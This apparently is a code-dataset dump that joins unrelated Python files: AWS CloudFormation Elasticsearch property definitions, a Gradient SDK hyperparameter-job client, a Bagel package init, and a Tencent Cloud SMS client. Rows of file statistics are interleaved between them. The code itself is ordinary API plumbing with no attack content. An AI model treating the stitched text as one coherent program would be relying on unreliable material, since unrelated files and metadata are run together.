"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html",
"Properties": {
"DedicatedMasterCount": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastercount",
"PrimitiveType": "Integer",
"Required": false,
"UpdateType": "Mutable"
},
"DedicatedMasterEnabled": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmasterenabled",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"DedicatedMasterType": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastertype",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Mutable"
},
"InstanceCount": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instancecount",
"PrimitiveType": "Integer",
"Required": false,
"UpdateType": "Mutable"
},
"InstanceType": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instnacetype",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Mutable"
},
"ZoneAwarenessEnabled": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-zoneawarenessenabled",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
}
}
}
"""
props = {
'DedicatedMasterCount': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastercount'),
'DedicatedMasterEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmasterenabled'),
'DedicatedMasterType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-dedicatedmastertype'),
'InstanceCount': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instancecount'),
'InstanceType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-instnacetype'),
'ZoneAwarenessEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-elasticsearchclusterconfig.html#cfn-elasticsearch-domain-elasticseachclusterconfig-zoneawarenessenabled')
}
# -------------------------------------------
class ElasticsearchSnapshotOptions(AWSProperty):
"""# SnapshotOptions - CloudFormationResourceSpecification version: 1.4.0
{
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-snapshotoptions.html",
"Properties": {
"AutomatedSnapshotStartHour": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-snapshotoptions.html#cfn-elasticsearch-domain-snapshotoptions-automatedsnapshotstarthour",
"PrimitiveType": "Integer",
"Required": false,
"UpdateType": "Mutable"
}
}
}
"""
props = {
'AutomatedSnapshotStartHour': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-snapshotoptions.html#cfn-elasticsearch-domain-snapshotoptions-automatedsnapshotstarthour')
}
# -------------------------------------------
class ElasticsearchEBSOptions(AWSProperty):
"""# EBSOptions - CloudFormationResourceSpecification version: 1.4.0
{
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html",
"Properties": {
"EBSEnabled": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-ebsenabled",
"PrimitiveType": "Boolean",
"Required": false,
"UpdateType": "Mutable"
},
"Iops": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-iops",
"PrimitiveType": "Integer",
"Required": false,
"UpdateType": "Mutable"
},
"VolumeSize": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumesize",
"PrimitiveType": "Integer",
"Required": false,
"UpdateType": "Mutable"
},
"VolumeType": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumetype",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Mutable"
}
}
}
"""
props = {
'EBSEnabled': (boolean, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-ebsenabled'),
'Iops': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-iops'),
'VolumeSize': (positive_integer, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumesize'),
'VolumeType': (basestring, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-elasticsearch-domain-ebsoptions.html#cfn-elasticsearch-domain-ebsoptions-volumetype')
}
# -------------------------------------------
class ElasticsearchDomain(AWSObject):
"""# AWS::Elasticsearch::Domain - CloudFormationResourceSpecification version: 1.4.0
{
"Attributes": {
"DomainArn": {
"PrimitiveType": "String"
},
"DomainEndpoint": {
"PrimitiveType": "String"
}
},
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html",
"Properties": {
"AccessPolicies": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-accesspolicies",
"PrimitiveType": "Json",
"Required": false,
"UpdateType": "Mutable"
},
"AdvancedOptions": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-advancedoptions",
"DuplicatesAllowed": false,
"PrimitiveItemType": "String",
"Required": false,
"Type": "Map",
"UpdateType": "Mutable"
},
"DomainName": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-domainname",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Immutable"
},
"EBSOptions": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-ebsoptions",
"Required": false,
"Type": "EBSOptions",
"UpdateType": "Mutable"
},
"ElasticsearchClusterConfig": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchclusterconfig",
"Required": false,
"Type": "ElasticsearchClusterConfig",
"UpdateType": "Mutable"
},
"ElasticsearchVersion": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchversion",
"PrimitiveType": "String",
"Required": false,
"UpdateType": "Immutable"
},
"SnapshotOptions": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-snapshotoptions",
"Required": false,
"Type": "SnapshotOptions",
"UpdateType": "Mutable"
},
"Tags": {
"Documentation": "http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-tags",
"DuplicatesAllowed": true,
"ItemType": "Tag",
"Required": false,
"Type": "List",
"UpdateType": "Mutable"
}
}
}
"""
resource_type = "AWS::Elasticsearch::Domain"
props = {
'AccessPolicies': ((basestring, dict), False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-accesspolicies'),
'AdvancedOptions': (dict, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-advancedoptions'),
'DomainName': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-domainname'),
'EBSOptions': (EBSOptions, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-ebsoptions'),
'ElasticsearchClusterConfig': (ElasticsearchClusterConfig, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchclusterconfig'),
'ElasticsearchVersion': (basestring, False, 'Immutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-elasticsearchversion'),
'SnapshotOptions': (SnapshotOptions, False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-snapshotoptions'),
'Tags': ([Tag], False, 'Mutable', 'http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-elasticsearch-domain.html#cfn-elasticsearch-domain-tags')
}
| 61.899038
| 274
| 0.692427
| 1,059
| 12,875
| 8.412653
| 0.07271
| 0.174879
| 0.051858
| 0.080144
| 0.838478
| 0.831743
| 0.758896
| 0.758896
| 0.758896
| 0.758896
| 0
| 0.001109
| 0.159689
| 12,875
| 207
| 275
| 62.198068
| 0.82235
| 0.624777
| 0
| 0.114286
| 0
| 0.542857
| 0.744433
| 0.020812
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.085714
| 0
| 0.342857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fbe563ee9ba6fb943f26f3dba6dca921de366d83
| 10,668
|
py
|
Python
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 52
|
2019-06-10T04:20:00.000Z
|
2021-12-06T01:13:26.000Z
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 125
|
2019-06-05T16:34:19.000Z
|
2022-03-30T18:46:06.000Z
|
gradient/api_sdk/clients/hyperparameter_client.py
|
vishalbelsare/gradient-cli
|
c0e06252925cad3ad73d47ded1100f6b0cb0989a
|
[
"0BSD"
] | 11
|
2019-07-16T06:48:55.000Z
|
2021-12-15T12:41:51.000Z
|
from . import base_client
from .base_client import TagsSupportMixin
from .. import models, repositories
class HyperparameterJobsClient(TagsSupportMixin, base_client.BaseClient):
entity = "experiment"
def create(
self,
name,
project_id,
tuning_command,
worker_container,
worker_machine_type,
worker_command,
worker_count,
worker_container_user=None,
worker_registry_username=None,
worker_registry_password=None,
is_preemptible=False,
ports=None,
workspace_url=None,
artifact_directory=None,
cluster_id=None,
experiment_env=None,
trigger_event_id=None,
model_type=None,
model_path=None,
dockerfile_path=None,
hyperparameter_server_registry_username=None,
hyperparameter_server_registry_password=None,
hyperparameter_server_container=None,
hyperparameter_server_container_user=None,
hyperparameter_server_machine_type=None,
working_directory=None,
use_dockerfile=False,
tags=None,
):
"""Create hyperparameter tuning job
:param str name: Name of new experiment [required]
:param str project_id: Project ID [required]
:param str tuning_command: Tuning command [required]
:param str worker_container: Worker container [required]
:param str worker_machine_type: Worker machine type [required]
:param str worker_command: Worker command [required]
:param int worker_count: Worker count [required]
:param str worker_container_user: Worker Container user
:param str worker_registry_username: Worker registry username
:param str worker_registry_password: Worker registry password
:param bool is_preemptible: Flag: is preemptible
:param str ports: Port to use in new experiment
:param str workspace_url: Project git repository url
:param str artifact_directory: Artifacts directory
:param str cluster_id: Cluster ID
:param dict experiment_env: Environment variables (in JSON)
:param str trigger_event_id: GradientCI trigger event id
:param str model_type: Model type
:param str model_path: Model path
:param str dockerfile_path: Path to dockerfile in project
:param str hyperparameter_server_registry_username: Hyperparameter server registry username
:param str hyperparameter_server_registry_password: Hyperparameter server registry password
:param str hyperparameter_server_container: Hyperparameter server container
:param str hyperparameter_server_container_user: Hyperparameter server container user
:param str hyperparameter_server_machine_type: Hyperparameter server machine type
:param str working_directory: Working directory for the experiment
:param bool use_dockerfile: Flag: use dockerfile
:param list[str] tags: List of tags
:returns: ID of a new job
:rtype: str
"""
if not is_preemptible:
is_preemptible = None
if use_dockerfile is False:
use_dockerfile = None
hyperparameter = models.Hyperparameter(
name=name,
project_id=project_id,
tuning_command=tuning_command,
worker_container=worker_container,
worker_container_user=worker_container_user,
worker_machine_type=worker_machine_type,
worker_command=worker_command,
worker_count=worker_count,
worker_registry_username=worker_registry_username,
worker_registry_password=worker_registry_password,
is_preemptible=is_preemptible,
ports=ports,
workspace_url=workspace_url,
artifact_directory=artifact_directory,
cluster_id=cluster_id,
experiment_env=experiment_env,
trigger_event_id=trigger_event_id,
model_type=model_type,
model_path=model_path,
dockerfile_path=dockerfile_path,
hyperparameter_server_machine_type=hyperparameter_server_machine_type,
hyperparameter_server_registry_username=hyperparameter_server_registry_username,
hyperparameter_server_registry_password=hyperparameter_server_registry_password,
hyperparameter_server_container=hyperparameter_server_container,
hyperparameter_server_container_user=hyperparameter_server_container_user,
working_directory=working_directory,
use_dockerfile=use_dockerfile,
)
repository = self.build_repository(repositories.CreateHyperparameterJob)
handle = repository.create(hyperparameter)
if tags:
self.add_tags(entity_id=handle, tags=tags)
return handle
def run(
self,
name,
project_id,
tuning_command,
worker_container,
worker_machine_type,
worker_command,
worker_count,
worker_registry_username=None,
worker_registry_password=None,
worker_container_user=None,
is_preemptible=False,
ports=None,
workspace_url=None,
artifact_directory=None,
cluster_id=None,
experiment_env=None,
trigger_event_id=None,
model_type=None,
model_path=None,
dockerfile_path=None,
hyperparameter_server_registry_username=None,
hyperparameter_server_registry_password=None,
hyperparameter_server_container_user=None,
hyperparameter_server_container=None,
hyperparameter_server_machine_type=None,
working_directory=None,
use_dockerfile=False,
tags=None,
):
"""Create and start hyperparameter tuning job
:param str name: Name of new experiment [required]
:param str project_id: Project ID [required]
:param str tuning_command: Tuning command [required]
:param str worker_container: Worker container [required]
:param str worker_machine_type: Worker machine type [required]
:param str worker_command: Worker command [required]
:param int worker_count: Worker count [required]
:param str worker_container_user: Worker container user
:param worker_registry_password: Worker registry password
:param worker_registry_username: Worker registry username
:param bool is_preemptible: Flag: is preemptible
:param str ports: Port to use in new experiment
:param str workspace_url: Project git repository url
:param str artifact_directory: Artifacts directory
:param str cluster_id: Cluster ID
:param dict experiment_env: Environment variables (in JSON)
:param str trigger_event_id: GradientCI trigger event id
:param str model_type: Model type
:param str model_path: Model path
:param str dockerfile_path: Path to dockerfile
:param str hyperparameter_server_registry_username: container registry username
:param str hyperparameter_server_registry_password: container registry password
:param str hyperparameter_server_container_user: hps container user
:param str hyperparameter_server_container: hps container
:param str hyperparameter_server_machine_type: hps machine type
:param str working_directory: Working directory for the experiment
:param bool use_dockerfile: Flag: use dockerfile
:param list[str] tags: List of tags
:returns: ID of a new job
:rtype: str
"""
if not is_preemptible:
is_preemptible = None
if use_dockerfile is False:
use_dockerfile = None
hyperparameter = models.Hyperparameter(
name=name,
project_id=project_id,
tuning_command=tuning_command,
worker_container=worker_container,
worker_machine_type=worker_machine_type,
worker_command=worker_command,
worker_count=worker_count,
worker_container_user=worker_container_user,
worker_registry_username=worker_registry_username,
worker_registry_password=worker_registry_password,
is_preemptible=is_preemptible,
ports=ports,
workspace_url=workspace_url,
artifact_directory=artifact_directory,
cluster_id=cluster_id,
experiment_env=experiment_env,
trigger_event_id=trigger_event_id,
model_type=model_type,
model_path=model_path,
dockerfile_path=dockerfile_path,
hyperparameter_server_registry_username=hyperparameter_server_registry_username,
hyperparameter_server_registry_password=hyperparameter_server_registry_password,
hyperparameter_server_container_user=hyperparameter_server_container_user,
hyperparameter_server_container=hyperparameter_server_container,
hyperparameter_server_machine_type=hyperparameter_server_machine_type,
working_directory=working_directory,
use_dockerfile=use_dockerfile,
)
repository = self.build_repository(repositories.CreateAndStartHyperparameterJob)
handle = repository.create(hyperparameter)
if tags:
self.add_tags(entity_id=handle, tags=tags)
return handle
def get(self, id):
"""Get Hyperparameter tuning job's instance
:param str id: Hyperparameter job id
:returns: instance of Hyperparameter
:rtype: models.Hyperparameter
"""
repository = self.build_repository(repositories.GetHyperparameterTuningJob)
job = repository.get(id=id)
return job
def start(self, id):
"""Start existing hyperparameter tuning job
:param str id: Hyperparameter job id
:raises: exceptions.GradientSdkError
"""
repository = self.build_repository(repositories.StartHyperparameterTuningJob)
repository.start(id_=id)
def list(self):
"""Get a list of hyperparameter tuning jobs
:rtype: list[models.Hyperparameter]
"""
repository = self.build_repository(repositories.ListHyperparameterJobs)
experiments = repository.list()
return experiments
| 41.189189
| 99
| 0.676134
| 1,095
| 10,668
| 6.283105
| 0.091324
| 0.053488
| 0.073256
| 0.040698
| 0.903634
| 0.889826
| 0.855087
| 0.786628
| 0.672965
| 0.672965
| 0
| 0
| 0.274934
| 10,668
| 258
| 100
| 41.348837
| 0.889463
| 0.339989
| 0
| 0.857143
| 0
| 0
| 0.001552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032468
| false
| 0.051948
| 0.019481
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22268766ad4731de4ee56b741bca3e66dd7d007a
| 110
|
py
|
Python
|
bagel/__init__.py
|
alumik/bagel-torch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | 1
|
2022-02-13T01:05:53.000Z
|
2022-02-13T01:05:53.000Z
|
bagel/__init__.py
|
AlumiK/bagel-pytorch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | null | null | null |
bagel/__init__.py
|
AlumiK/bagel-pytorch
|
455d6e000263f15d85b49fa1857108393c8aaf08
|
[
"MIT"
] | 1
|
2022-03-04T07:40:03.000Z
|
2022-03-04T07:40:03.000Z
|
import bagel.data
import bagel.models
import bagel.testing
import bagel.utils
from bagel.models import Bagel
| 15.714286
| 30
| 0.836364
| 17
| 110
| 5.411765
| 0.411765
| 0.597826
| 0.369565
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118182
| 110
| 6
| 31
| 18.333333
| 0.948454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3f2f177344f61f137f667540ae0067f32f600333
| 10,427
|
py
|
Python
|
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | 4
|
2019-07-04T10:01:16.000Z
|
2022-01-23T07:15:52.000Z
|
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | null | null | null |
moni-alert/bin/qcloudsms_py/sms.py
|
jimdn/monitor-toolkits
|
d0e3c1215c2b17047f9eae061b37efb3bb9eb6f8
|
[
"MIT"
] | 5
|
2019-08-11T14:22:14.000Z
|
2020-12-03T03:13:44.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import json
from qcloudsms_py import util
from qcloudsms_py.httpclient import HTTPRequest
class SmsSingleSender(object):
def __init__(self, appid, appkey):
self._appid = appid
self._appkey = appkey
self._url = "https://yun.tim.qq.com/v5/tlssmssvr/sendsms";
def send(self, sms_type, nation_code, phone_number, msg,
extend="", ext=""):
"""Send single SMS message.
:param msg_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param phone_number: phone number
:param msg: SMS message content
:param extend: extend field, default is empty string
:param ext: ext field, content will be returned by server as it is
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"tel": {
"nationcode": str(nation_code),
"mobile": str(phone_number)
},
"type": int(sms_type),
"msg": str(msg),
"sig": util.calculate_signature(
self._appkey, rand, now, [phone_number]),
"time": now,
"extend": str(extend),
"ext": str(ext)
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
def send_with_param(self, nation_code, phone_number, template_id,
params, sign="", extend="", ext=""):
"""Send single SMS message with template paramters.
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param phone_number: phone number
:param template_id: template id
:param params: template parameters
:param sign: Sms user sign
:param extend: extend field, default is empty string
:param ext: ext field, content will be returned by server as it is
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"tel": {
"nationcode": str(nation_code),
"mobile": str(phone_number)
},
"sign": str(sign),
"tpl_id": int(template_id),
"params": params,
"sig": util.calculate_signature(
self._appkey, rand, now, [phone_number]),
"time": now,
"extend": str(extend),
"ext": str(ext)
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
class SmsMultiSender(object):
def __init__(self, appid, appkey):
self._appid = appid
self._appkey = appkey
self._url = "https://yun.tim.qq.com/v5/tlssmssvr/sendmultisms2"
def send(self, sms_type, nation_code, phone_numbers, msg,
extend="", ext=""):
"""Send a SMS messages to multiple phones at once.
:param number: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param phone_numbers: phone number array
:param msg: SMS message content
:param extend: extend field, default is empty string
:param ext: ext field, content will be returned by server as it is
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"tel": [{"nationcode": nation_code, "mobile": pn}
for pn in phone_numbers],
"type": int(sms_type),
"msg": str(msg),
"sig": util.calculate_signature(
self._appkey, rand, now, phone_numbers),
"time": now,
"extend": str(extend),
"ext": str(ext)
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
def send_with_param(self, nation_code, phone_numbers, template_id,
params, sign="", extend="", ext=""):
"""
Send a SMS messages with template parameters to multiple
phones at once.
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param phone_numbers: multiple phone numbers
:param template_id: template id
:param params: template parameters
:param sign: Sms user sign
:param extend: extend field, default is empty string
:param ext: ext field, content will be returned by server as it is
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"tel": [{"nationcode": nation_code, "mobile": pn}
for pn in phone_numbers],
"sign": sign,
"tpl_id": int(template_id),
"params": params,
"sig": util.calculate_signature(
self._appkey, rand, now, phone_numbers),
"time": now,
"extend": str(extend),
"ext": str(ext)
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
class SmsStatusPuller(object):
def __init__(self, appid, appkey):
self._appid = appid
self._appkey = appkey
self._url = "https://yun.tim.qq.com/v5/tlssmssvr/pullstatus"
def _pull(self, sms_type, max_num):
"""Pull SMS message status.
:param msg_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
:param max_num: maximum number of message status
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"sig": util.calculate_signature(
self._appkey, rand, now),
"time": now,
"type": sms_type,
"max": max_num
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
def pull_callback(self, max_num):
"""Pull callback SMS messages status.
:param max_num: maximum number of message status
"""
return self._pull(0, max_num)
def pull_reply(self, max_num):
"""Pull reply SMS messages status.
:param max_num: maximum number of message status
"""
return self._pull(1, max_num)
class SmsMobileStatusPuller(object):
def __init__(self, appid, appkey):
self._appid = appid;
self._appkey = appkey;
self._url = "https://yun.tim.qq.com/v5/tlssmssvr/pullstatus4mobile"
def _pull(self, msg_type, nation_code, mobile, begin_time, end_time, max_num):
"""Pull SMS messages status for single mobile.
:param msg_type: SMS message type, Enum{0: normal SMS, 1: marketing SMS}
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param mobile: mobile number
:param begin_time: begin time, unix timestamp
:param end_time: end time, unix timestamp
:param max_num: maximum number of message status
"""
rand = util.get_random()
now = util.get_current_time()
url = "{}?sdkappid={}&random={}".format(
self._url, self._appid, rand)
req = HTTPRequest(
url=url,
method="POST",
headers={"Content-Type": "application/json"},
body={
"sig": util.calculate_signature(
self._appkey, rand, now),
"type": msg_type,
"time": now,
"max": max_num,
"begin_time": begin_time,
"end_time": end_time,
"nationcode": str(nation_code),
"mobile": str(mobile)
},
connect_timeout=60,
request_timeout=60
)
return util.api_request(req)
def pull_callback(self, nation_code, mobile, begin_time,
end_time, max_num):
"""Pull callback SMS message status for single mobile.
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param mobile: mobile number
:param begin_time: begin time, unix timestamp
:param end_time: end time, unix timestamp
:param max_num: maximum number of message status
"""
return self._pull(0, nation_code, mobile,
begin_time, end_time, max_num)
def pull_reply(self, nation_code, mobile, begin_time,
end_time, max_num):
"""Pull reply SMS message status for single mobile.
:param nation_code: nation dialing code, e.g. China is 86, USA is 1
:param mobile: mobile number
:param begin_time: begin time, unix timestamp
:param end_time: end time, unix timestamp
:param max_num: maximum number of message status
"""
return self._pull(1, nation_code, mobile,
begin_time,end_time, max_num)
| 35.587031
| 82
| 0.544356
| 1,177
| 10,427
| 4.649108
| 0.119796
| 0.038377
| 0.02924
| 0.026864
| 0.895102
| 0.882858
| 0.846857
| 0.834795
| 0.822734
| 0.808845
| 0
| 0.009426
| 0.348806
| 10,427
| 292
| 83
| 35.708904
| 0.796465
| 0.266711
| 0
| 0.725806
| 0
| 0
| 0.108864
| 0.020228
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075269
| false
| 0
| 0.021505
| 0
| 0.172043
| 0.005376
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f43c5d5a4444a34f66cb621377fefb4aeb459f9
| 12,452
|
py
|
Python
|
benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
benchmarks/eog_blinktemplate/script.py
|
raimonpv/NeuroKit
|
cb37d83ee20d6a13a91c4848aa435f41e979e203
|
[
"MIT"
] | null | null | null |
